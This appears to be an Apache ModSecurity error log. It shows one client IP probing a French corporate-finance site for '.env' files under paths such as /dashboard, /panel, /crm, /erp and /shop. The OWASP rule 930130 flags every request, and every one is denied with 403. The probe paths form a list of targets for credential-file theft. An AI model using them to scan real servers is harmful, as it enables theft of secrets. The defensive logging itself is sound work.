[Mon May 11 16:26:22.581935 2026] [security2:error] [pid 1412074:tid 1412098] [client 18.180.54.2:58562] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/local/.env"] [unique_id "agHnDjJnyuKVXoStDha0rgAAAFY"]
[Mon May 11 16:26:22.889626 2026] [security2:error] [pid 1416109:tid 1416139] [client 18.180.54.2:58570] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dashboard/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/dashboard/.env"] [unique_id "agHnDlV4kyjgo4bQBUhUTAAAAMk"]
[Mon May 11 16:26:22.889850 2026] [security2:error] [pid 1416109:tid 1416139] [client 18.180.54.2:58570] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/dashboard/.env"] [unique_id "agHnDlV4kyjgo4bQBUhUTAAAAMk"]
[Mon May 11 16:26:22.890410 2026] [core:error] [pid 1416109:tid 1416139] [client 18.180.54.2:58570] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:22.890565 2026] [security2:error] [pid 1416109:tid 1416139] [client 18.180.54.2:58570] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/dashboard/.env"] [unique_id "agHnDlV4kyjgo4bQBUhUTAAAAMk"]
[Mon May 11 16:26:23.324750 2026] [security2:error] [pid 1412074:tid 1412085] [client 18.180.54.2:58576] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/portal/.env"] [unique_id "agHnDzJnyuKVXoStDha0twAAAEk"]
[Mon May 11 16:26:23.324978 2026] [security2:error] [pid 1412074:tid 1412085] [client 18.180.54.2:58576] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/portal/.env"] [unique_id "agHnDzJnyuKVXoStDha0twAAAEk"]
[Mon May 11 16:26:23.326236 2026] [core:error] [pid 1412074:tid 1412085] [client 18.180.54.2:58576] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:23.327461 2026] [security2:error] [pid 1412074:tid 1412085] [client 18.180.54.2:58576] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/portal/.env"] [unique_id "agHnDzJnyuKVXoStDha0twAAAEk"]
[Mon May 11 16:26:23.577292 2026] [security2:error] [pid 1411201:tid 1411424] [client 18.180.54.2:58580] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /panel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/panel/.env"] [unique_id "agHnD_y_GXSWIKeli0vyXQAAAJM"]
[Mon May 11 16:26:23.577551 2026] [security2:error] [pid 1411201:tid 1411424] [client 18.180.54.2:58580] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/panel/.env"] [unique_id "agHnD_y_GXSWIKeli0vyXQAAAJM"]
[Mon May 11 16:26:23.578080 2026] [core:error] [pid 1411201:tid 1411424] [client 18.180.54.2:58580] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:23.578252 2026] [security2:error] [pid 1411201:tid 1411424] [client 18.180.54.2:58580] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/panel/.env"] [unique_id "agHnD_y_GXSWIKeli0vyXQAAAJM"]
[Mon May 11 16:26:24.070029 2026] [security2:error] [pid 1411055:tid 1411057] [client 18.180.54.2:58588] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dashboard/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/dashboard/.env"] [unique_id "agHnEEWKUxpmnkK7zHx8CQAAAQA"]
[Mon May 11 16:26:24.070282 2026] [security2:error] [pid 1411055:tid 1411057] [client 18.180.54.2:58588] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/dashboard/.env"] [unique_id "agHnEEWKUxpmnkK7zHx8CQAAAQA"]
[Mon May 11 16:26:24.070805 2026] [core:error] [pid 1411055:tid 1411057] [client 18.180.54.2:58588] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:24.071204 2026] [security2:error] [pid 1411055:tid 1411057] [client 18.180.54.2:58588] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/dashboard/.env"] [unique_id "agHnEEWKUxpmnkK7zHx8CQAAAQA"]
[Mon May 11 16:26:24.257446 2026] [security2:error] [pid 1416109:tid 1416135] [client 18.180.54.2:58604] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /crm/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/crm/.env"] [unique_id "agHnEFV4kyjgo4bQBUhUUQAAAMU"]
[Mon May 11 16:26:24.257682 2026] [security2:error] [pid 1416109:tid 1416135] [client 18.180.54.2:58604] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/crm/.env"] [unique_id "agHnEFV4kyjgo4bQBUhUUQAAAMU"]
[Mon May 11 16:26:24.258313 2026] [core:error] [pid 1416109:tid 1416135] [client 18.180.54.2:58604] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:24.258513 2026] [security2:error] [pid 1416109:tid 1416135] [client 18.180.54.2:58604] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/crm/.env"] [unique_id "agHnEFV4kyjgo4bQBUhUUQAAAMU"]
[Mon May 11 16:26:24.815512 2026] [security2:error] [pid 1416109:tid 1416142] [client 18.180.54.2:58620] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /panel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/panel/.env"] [unique_id "agHnEFV4kyjgo4bQBUhUUgAAAMw"]
[Mon May 11 16:26:24.815746 2026] [security2:error] [pid 1416109:tid 1416142] [client 18.180.54.2:58620] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/panel/.env"] [unique_id "agHnEFV4kyjgo4bQBUhUUgAAAMw"]
[Mon May 11 16:26:24.816289 2026] [core:error] [pid 1416109:tid 1416142] [client 18.180.54.2:58620] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:24.816447 2026] [security2:error] [pid 1416109:tid 1416142] [client 18.180.54.2:58620] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/panel/.env"] [unique_id "agHnEFV4kyjgo4bQBUhUUgAAAMw"]
[Mon May 11 16:26:24.982998 2026] [security2:error] [pid 1412074:tid 1412078] [client 18.180.54.2:58624] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /erp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/erp/.env"] [unique_id "agHnEDJnyuKVXoStDha0vQAAAEI"]
[Mon May 11 16:26:24.983231 2026] [security2:error] [pid 1412074:tid 1412078] [client 18.180.54.2:58624] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/erp/.env"] [unique_id "agHnEDJnyuKVXoStDha0vQAAAEI"]
[Mon May 11 16:26:24.983739 2026] [core:error] [pid 1412074:tid 1412078] [client 18.180.54.2:58624] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:24.983898 2026] [security2:error] [pid 1412074:tid 1412078] [client 18.180.54.2:58624] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/erp/.env"] [unique_id "agHnEDJnyuKVXoStDha0vQAAAEI"]
[Mon May 11 16:26:25.516800 2026] [security2:error] [pid 1411055:tid 1411081] [client 18.180.54.2:58632] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /crm/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/crm/.env"] [unique_id "agHnEUWKUxpmnkK7zHx8DAAAARg"]
[Mon May 11 16:26:25.517035 2026] [security2:error] [pid 1411055:tid 1411081] [client 18.180.54.2:58632] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/crm/.env"] [unique_id "agHnEUWKUxpmnkK7zHx8DAAAARg"]
[Mon May 11 16:26:25.517553 2026] [core:error] [pid 1411055:tid 1411081] [client 18.180.54.2:58632] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:25.517741 2026] [security2:error] [pid 1411055:tid 1411081] [client 18.180.54.2:58632] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/crm/.env"] [unique_id "agHnEUWKUxpmnkK7zHx8DAAAARg"]
[Mon May 11 16:26:25.732787 2026] [security2:error] [pid 1411201:tid 1411254] [client 18.180.54.2:58642] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /shop/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/shop/.env"] [unique_id "agHnEfy_GXSWIKeli0vyYQAAAIg"]
[Mon May 11 16:26:25.733068 2026] [security2:error] [pid 1411201:tid 1411254] [client 18.180.54.2:58642] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/shop/.env"] [unique_id "agHnEfy_GXSWIKeli0vyYQAAAIg"]
[Mon May 11 16:26:25.733567 2026] [core:error] [pid 1411201:tid 1411254] [client 18.180.54.2:58642] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:25.733721 2026] [security2:error] [pid 1411201:tid 1411254] [client 18.180.54.2:58642] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/shop/.env"] [unique_id "agHnEfy_GXSWIKeli0vyYQAAAIg"]
[Mon May 11 16:26:26.205219 2026] [security2:error] [pid 1411099:tid 1411123] [client 18.180.54.2:58658] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /erp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/erp/.env"] [unique_id "agHnEg-Qm4vhlWBPlMi6HwAAABc"]
[Mon May 11 16:26:26.205453 2026] [security2:error] [pid 1411099:tid 1411123] [client 18.180.54.2:58658] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/erp/.env"] [unique_id "agHnEg-Qm4vhlWBPlMi6HwAAABc"]
[Mon May 11 16:26:26.206013 2026] [core:error] [pid 1411099:tid 1411123] [client 18.180.54.2:58658] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:26.206190 2026] [security2:error] [pid 1411099:tid 1411123] [client 18.180.54.2:58658] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/erp/.env"] [unique_id "agHnEg-Qm4vhlWBPlMi6HwAAABc"]
[Mon May 11 16:26:26.440331 2026] [security2:error] [pid 1411201:tid 1411252] [client 18.180.54.2:58668] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /store/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/store/.env"] [unique_id "agHnEvy_GXSWIKeli0vyYgAAAIY"]
[Mon May 11 16:26:26.440557 2026] [security2:error] [pid 1411201:tid 1411252] [client 18.180.54.2:58668] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/store/.env"] [unique_id "agHnEvy_GXSWIKeli0vyYgAAAIY"]
[Mon May 11 16:26:26.441016 2026] [core:error] [pid 1411201:tid 1411252] [client 18.180.54.2:58668] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 16:26:26.441186 2026] [security2:error] [pid 1411201:tid 1411252] [client 18.180.54.2:58668] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/store/.env"] [unique_id "agHnEvy_GXSWIKeli0vyYgAAAIY"]
[Mon May 11 16:26:26.889671 2026] [security2:error] [pid 1411099:tid 1411113] [client 18.180.54.2:58672] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /shop/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/shop/.env"] [unique_id "agHnEg-Qm4vhlWBPlMi6IQAAAA0"]
